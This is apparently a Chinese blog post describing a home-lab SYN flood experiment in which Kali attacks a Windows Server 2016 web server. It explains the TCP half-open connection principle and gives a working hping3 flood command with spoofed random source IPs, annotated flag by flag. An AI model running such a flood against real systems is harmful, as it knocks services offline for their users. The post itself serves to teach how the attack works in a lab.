当前位置:   article > 正文

TCP--SYN Flood实验_syn洪水实验

syn洪水实验

目录

一、SYN Flood攻击原理

二、实验

1、准备两台机器

2、准备

3、攻击

三、问题


一、SYN Flood攻击原理

TCP协议通过三次握手来建立客户端与服务端的连接(上篇文章有介绍),客户端发送一个SYN包给服务端,服务端接收到后会回复一个SYN+ACK包给客户端,然后等待客户端回复ACK包。

如果此时客户端不回复ACK包,那么服务器端会重发SYN+ACK包给客户端,此时服务端处于半连接状态,客户端一直只发送SYN包,但不回复ACK包,那么将会占用、耗尽服务端的资源,这就是SYN Flood攻击。

二、实验

1、准备两台机器

kali(客户端)   Windows-server2016(服务器端)

2、准备

使两台机器处于同网段,相互之间可以通信(建议使用桥接)。

在服务器端开启web服务,查看是否可以浏览默认网络页面。

3、攻击

在kali中调用命令行,使用kali自带工具进行攻击

hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.31.54

"-c"数据包的数量   

"-d"每个数据包的大小 

 "-S"只发送SYN报文 

 "-w"窗口大小   

"-p"目标端口

"--flood"持续、快速的发送数据包

"--rand-source"生成随机IP

"192.168.31.54"服务器端IP

执行指令后服务器端抓包可以看到,随机的IP地址给服务器端发送SYN报文,服务器端回应SYN+ACK报文,此时服务器资源被占用,再去访问一下页面

这时会发现访问的页面会变得卡顿,甚至崩溃。

三、问题

在做实验的过程中遇到了没解决掉的问题,在server2016 web安装好之后,kali无法访问网站页面,物理机、kali、server2016之间是可以相互ping通的,防火墙也是关闭状态,物理机可以正常访问页面,另外开一台Windows10也可以正常访问网站页面,经过半天搜索也没有解决,但是攻击、抓包这些还是正常,希望有大佬可以回答一下,谢谢啦~

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Cpp五条/article/detail/542984
推荐阅读
相关标签
  

闽ICP备14008679号